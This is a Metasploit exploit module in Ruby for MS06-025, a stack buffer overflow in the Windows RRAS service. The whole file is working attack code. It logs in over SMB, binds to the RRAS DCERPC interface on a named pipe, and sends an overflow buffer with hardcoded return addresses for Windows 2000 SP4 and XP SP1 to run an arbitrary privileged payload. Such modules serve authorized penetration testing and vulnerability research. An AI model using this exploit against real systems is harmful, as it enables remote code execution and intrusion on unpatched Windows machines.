require 'msf/core'

module Msf

class Exploits::Windows::Smb::MS06_025_RRAS < Msf::Exploit::Remote

	include Exploit::Remote::DCERPC
	include Exploit::Remote::SMB


	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft RRAS MS06-025 Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in the RRAS
			service shipped with each version of Windows. This
			vulnerability is not accessible to anonymous users
			on any platform other than Windows XP SP1. When
			exploiting XP SP1, 'SRVSVC' will need to be
			specified as the SMBPIPE parameter.
			},
			'Author'         => [ 'anonymous', 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'MSB', 'MS06-025'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1104,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 'Windows 2000 SP4', { 'Ret' => 0x7571c1e4 } ],
					[ 'Windows XP SP1',   { 'Ret' => 0x7248d4cc } ],
				],

			'DisclosureDate' => 'Jun 13 2006'))
			
		register_options(
			[
				OptString.new('SMBPIPE', [ true,  "The pipe name to use (ROUTER, SRVSVC)", 'ROUTER']),
			], self.class)
						
	end

	def exploit	
		
		connect()
		smb_login()

		handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
		
		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")


		print_status('Getting OS...')
		
		# Check the remote OS name and version
		os = smb_peer_lm
		pat = ''
		
		case os
		when /2000/
			pat = 
				payload.encoded +
				"\xeb\x06" +
				Rex::Text.rand_text_alphanumeric(2) +
				[target.ret].pack('V') +
				"\xe9\xb7\xfb\xff\xff"
			os = 'Windows 2000'
		when /XP/
			pat =
				Rex::Text.rand_text_alphanumeric(0x4c) +
				"\xeb\x06" +
				Rex::Text.rand_text_alphanumeric(2) +
				[target.ret].pack('V') +
				payload.encoded
			os = 'Windows XP'				
		end
			
		req = [1, 0x49].pack('VV') + pat + Rex::Text.rand_text_alphanumeric(0x4000-pat.length)
		len = req.length
		stb = 
			NDR.long(0x20000) +
			NDR.long(len) +
			req           + 
			NDR.long(len)

		print_status("Calling the vulnerable function on #{os}...")
		
		begin
			dcerpc.call(0x0C, stb)
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
		rescue => e
			if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
				raise e
			end
		end

		# Cleanup
		handler
		disconnect
	end

end
end